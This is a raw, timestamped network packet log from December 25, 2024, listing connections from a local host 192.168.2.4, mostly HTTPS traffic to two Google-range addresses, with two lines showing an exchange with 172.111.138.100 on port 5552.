                                                                                                                                                                Dec 25, 2024 09:08:02.813700914 CET49862443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.813749075 CET49863443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:02.813760042 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:02.813787937 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.814140081 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.814202070 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.814604044 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.815588951 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.815622091 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.817164898 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817177057 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.817249060 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817945004 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817955971 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.506887913 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.507019997 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.507760048 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.507915974 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513297081 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513313055 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513509035 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513544083 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513606071 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513614893 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.514162064 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.514202118 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.514250994 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.517656088 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.517659903 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.517854929 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.517925978 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.518291950 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.555347919 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.563323975 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.407766104 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.407936096 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.408006907 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.408276081 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.408288956 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.408332109 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409048080 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409081936 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.409609079 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409668922 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.409720898 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.411179066 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.411195040 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.413145065 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413207054 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.413279057 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413460970 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413489103 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.417960882 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418019056 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418030977 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418073893 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418104887 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418135881 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418189049 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418659925 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.418741941 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418836117 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.418898106 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418912888 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418962002 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.419261932 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.419272900 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.419636965 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.419671059 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.112653971 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.112716913 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.113261938 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.113276958 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.116274118 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.116281986 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.117651939 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.117718935 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.118172884 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.118246078 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.120717049 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.120735884 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.120950937 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.121037006 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.121324062 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.121732950 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.121788025 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.121962070 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.121973991 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.123738050 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.123754025 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.124876976 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.124922037 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.125241041 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.125304937 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.125654936 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.163346052 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.167332888 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.014472961 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.015403986 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.015587091 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.015904903 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016032934 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016067028 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016140938 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016730070 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016748905 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016760111 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016864061 CET44349890142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.017113924 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018450022 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018464088 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018486977 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018502951 CET44349890142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018620968 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018683910 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727514982 CET44349921142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.727575064 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727813959 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727827072 CET44349921142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741365910 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741425991 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741441965 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741477966 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741506100 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741552114 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741564989 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741621017 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742146969 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742177963 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742185116 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742218018 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742245913 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742245913 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742279053 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742551088 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742594957 CET44349922142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742718935 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742866039 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742885113 CET44349922142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986488104 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986551046 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986577988 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.986601114 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986613035 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.986680031 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986753941 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.988684893 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.988699913 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.989217043 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989274025 CET44349924142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.989365101 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989634991 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989655972 CET44349924142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.204741955 CET49920443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.204790115 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.204796076 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:14.204859972 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:14.207710028 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.207745075 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.207890987 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208095074 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208137035 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.208488941 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208772898 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208786011 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.208807945 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208823919 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.243531942 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.300992012 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:08:15.899086952 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.899171114 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.899740934 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.899799109 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.904486895 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.904495001 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.904704094 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.904808998 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.905124903 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.905720949 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.905802011 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.908678055 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.908803940 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.912358046 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.912368059 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.912787914 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.912894011 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.913197994 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.947379112 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.955369949 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807085991 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807727098 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807742119 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807869911 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807940006 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807984114 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.808063984 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.808660030 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.808759928 CET44349934142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.808840990 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.810333967 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810342073 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.810352087 CET44349935142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.810376883 CET44349934142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.810591936 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810683012 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810693979 CET44349935142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816400051 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816555023 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.816561937 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816658974 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820208073 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820308924 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.820741892 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.820832968 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820832968 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821070910 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821083069 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821115017 CET44349936142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821166039 CET44349937142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821273088 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821281910 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821563959 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821599960 CET44349937142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821862936 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821880102 CET44349936142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:18.204665899 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.204701900 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:18.204731941 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.204735994 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:18.205188036 CET49944443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.205229044 CET44349944142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:18.205387115 CET49944443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.205744982 CET49944443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.205764055 CET44349944142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:18.206695080 CET49945443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.206717014 CET44349945142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:18.206932068 CET49945443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:23.915694952 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:23.916538954 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:23.916548967 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.605187893 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.605307102 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.605482101 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.605575085 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.605829954 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.605988026 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.606187105 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.606282949 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.609458923 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.609472990 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.609674931 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.609739065 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.611574888 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.611576080 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.611589909 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.611772060 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.611876965 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.612206936 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:25.655375957 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:25.659337044 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.507041931 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.508049011 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.508127928 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.510335922 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.513048887 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.514909029 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.514938116 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.514959097 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.514996052 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.759397984 CET49969443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.759438992 CET44349969142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.760152102 CET49980443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.760204077 CET44349980142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.760287046 CET49980443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.760567904 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.760595083 CET44349981142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.760648012 CET49970443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.760662079 CET44349970142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.760664940 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.761135101 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.761147976 CET44349981142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.761672974 CET49982443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.761683941 CET44349982142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.761804104 CET49982443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.762012005 CET49983443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.762026072 CET44349983142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.762104034 CET49983443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.833843946 CET49980443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.833861113 CET44349980142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.834098101 CET49982443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:26.834110022 CET44349982142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:26.834270000 CET49983443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:26.834291935 CET44349983142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:28.448932886 CET44349981142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:28.449201107 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:28.449687958 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:28.449693918 CET44349981142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:28.451710939 CET49981443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:28.451714993 CET44349981142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:28.523760080 CET44349982142.250.181.97192.168.2.4
